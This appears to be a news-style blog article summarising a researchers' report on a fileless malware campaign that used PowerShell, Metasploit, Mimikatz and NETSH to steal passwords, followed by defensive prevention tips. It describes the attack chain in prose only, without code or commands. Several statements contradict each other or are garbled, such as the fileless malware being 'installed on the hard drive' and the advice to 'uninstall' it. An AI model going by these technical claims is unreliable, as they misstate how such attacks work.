A new malware has been identified by some malware researchers that infect 140 organizations around the world. This is called as Fileless Malware that injects secretly into the memory and then leaves no signs of intrusion. It makes its detection difficult. However some Russian based Kaspersky Lab have published a report that Fileless Malware stucks so many banks, governments and other Telecom companies of 40 countries, but it didn’t give these hackers any appropriate name.
Fileless Malware is a non malware attack that occurs when an hacker uses existing software, approved applications and authorized protocols to carry out malicious activities. These attacks can control their system, without downloading any malicious files. This is a variant of the malicious software because it exists in the computer’s memory called RAM and does not write to any part of computer’s files. It get installed on the hard drive where it can be dissolved by some security scans. The attackers just employed widely used system administration and security tools that includes PowerShell, Metasploit and Mimikatz to inject their malicious codes into their computer memory.
They hosted their operation on the poorly controlled country code top level domains as Gabon, the Central African Republic and Mail, the researcher states “The trick of using some domains is that they are free and missing Whois Information, after domain expiration”.
Here its given that the attackers used the Metasploit Framework, standard Windows utilities and unknown domains with no Whois information, this makes attribution almost impossible,” they conclude. The researchers also add that the groups with the most similar tactics, techniques and some procedures, are banking fraud crime groups GCMAN and Carbanak.
Highlights of Fileless Malware Attacks:-
- When user visits any site using Firefox browser.
- On website the Flash software is loaded.
- This Flash invoked PowerShell, that is used as an Operating System Tool that is part of every Windows computer. It sends instructions by commands that resides in the memory.
- This PowerShell get connects with the C&C (Command and Control) Server. It downloads a malicious PowerShell Script. Its code gets hide in the memory and steals all your passwords and other sensitive data from your system administrators. This information is sent to the attacker. At no point it get downloaded into the infected machine.
Then after Fileless Malware attackers obtains some passwords using standard utilities as Microsoft’s Command line scripting utility NETSH. This tool sends some compromised passwords from the victim’s computer to attacker’s C&C server. Here, attackers gain full access to the computer. Since it resides in the memory, so whenever any victims reboot their system, all traces of attack get disappear. It makes us so difficult to detect and investigate Fileless Malware, when its attack originated.
Prevention Tips For Fileless Malware Detection:-
Therefore, a Gartner Security Analyst Avivah Litan says that this Fileless Malware attacks are becoming more common and evade into most of the endpoint protection and detection tools. He advises the organizations to take following step, in order to prevent Fileless Malware attacks.
- Patch Systems often to avoid some common vulnerabilities.
- You should limit the use of system administrative tools as Microsoft PowerShell. Just access those tools that are based on the reasonable need.
- Always invest in reputable companies products that adds protection against memory attacks.
- Apparently, use application controls on endpoint computers, that ensures only an organizations approved applications.
Therefore, its highly recommended by IT Professionals and cyber security firms to stop inviting this vulnerable application into your system, and uninstall Fileless Malware timely and safely, to get prevent from its future attacks.